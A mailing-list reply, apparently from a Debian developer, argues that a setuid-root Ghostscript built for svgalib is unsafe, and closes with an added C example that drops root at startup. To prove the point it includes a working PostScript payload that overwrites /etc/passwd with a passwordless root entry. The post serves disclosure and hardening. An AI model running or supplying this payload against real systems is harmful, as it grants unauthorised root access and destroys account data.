
Re: gs shouldn't depend on svgalib



> 
> joost witteveen writes:
> 
> >However, if it proves to be really easy to modify the gs svga code,
> >I'll make it give up its setuid root privileges there (that would be
> >best, but also the most work (if any work is needed in the first
> >place -- maybe the code already does this)).
> 
> vga_init() does indeed already give up the root permissions, like
> this:

vga_init does -- but that's not all I need. This would mean gs would ONLY
give up its root privileges if the output goes to svgalib. All a
hacker would need to do is:

cat <<EOF |gs -sDEVICE=ppm
%!PS
(/etc/passwd) (r) file /passwd exch def
(/etc/passwd.old) (w) file /passwdb exch def
/s (hello)  def
{passwd s readstring
{passwdb s writestring pop} 
{passwdb s writestring pop exit} ifelse
} loop

passwdb closefile
passwdb closefile
(/etc/passwd) (w) file /passwd exch def
passwd (root::0:0:root:/root:/bin/bash\012) writestring
passwd closefile
EOF

and gs will not give up its root privileges, and happily modify
/etc/passwd. I also need some way to determine whether gs will
call vga_init() to surrender its root privileges. At the moment
the wrapper I sent to the list does this, but a good hacker will probably
not find it hard to get around this.

For this reason, I think the best thing to do is to simply make gs
(or the wrapper) NOT setuid by default, but only allow a local
sysadmin to make it so (thereby giving up (some) security, but this
is for local systems often not too bad).

> Basically the first thing gs (and indeed any svgalib program) should
> do is call vga_init or surrender root permissions by some other means.
> If there's a situation in which it doesn't do this then it's a bug!

But then I have to modify more in gs (not just the svga part).
As I said, I don't really like doing this (and having to modify this
in next releases, ..).

> 
> >>What we really need is some kernel support for graphics cards...
> >We've got X, of course -- I see svgalib only for the die-hards.
> 
> Having grown up on much smaller computers I find direct access to the
> display hardware has a certain charm l-)

But then you maybe also think having direct access to other system resources
(/dev/hda1, ...) has some charm. In short, I do think svgalib
should be usable, and I do want to go some way to keep your system
somewhat secure, but I don't want to rewrite the gs initialisation
code just for those who want to use gs-svga, and have a secure system.

-- 
joost witteveen
            joost@rulcmc.leidenuniv.nl
          joostje@debian.org
--
Use Debian Linux!
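The point argued in the thread above is that a setuid-root program must surrender root as its first action, before any input is parsed, rather than only on the code path that happens to call vga_init(). The following C program is an added illustration of that pattern; it is not code from gs, svgalib or the mailing-list post, and it assumes a Linux/glibc system where setuid() called by root also resets the saved uid (the seteuid(0) probe is what verifies that).

```c
/* Added example: drop root at the very start of main(), independent of
 * which output device the program will later select.  Not gs code. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Return 0 when the process now runs entirely as the invoking (real) user
 * and cannot get root back; -1 if any step fails.  The group is dropped
 * first: once the effective uid is no longer root, setgid() would fail. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0)
        return -1;
    if (setuid(ruid) != 0)
        return -1;

    /* Check that real and effective ids really changed. */
    if (getuid() != ruid || geteuid() != ruid)
        return -1;
    if (getgid() != rgid || getegid() != rgid)
        return -1;

    /* For a non-root invoker, prove the saved uid is no longer 0: an
     * attempt to become root again must be refused with EPERM.  (When the
     * invoker is root itself there is nothing to drop, so skip the probe.) */
    if (ruid != 0) {
        if (seteuid(0) == 0)
            return -1;          /* saved uid was still root: drop failed */
        if (errno != EPERM)
            return -1;
    }
    return 0;
}

int main(void)
{
    /* First statement: before argv parsing, before any file or device is
     * opened, and before a single byte of PostScript is interpreted. */
    if (drop_privileges() != 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("running as uid %u / gid %u, euid %u\n",
           (unsigned)getuid(), (unsigned)getgid(), (unsigned)geteuid());
    /* ... only now read and interpret input ... */
    return 0;
}
```

Placing the drop at the top of main() removes the need the post describes for a wrapper to guess whether gs will reach vga_init(): whatever device the PostScript selects, the interpreter already runs as the invoking user when it opens files.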

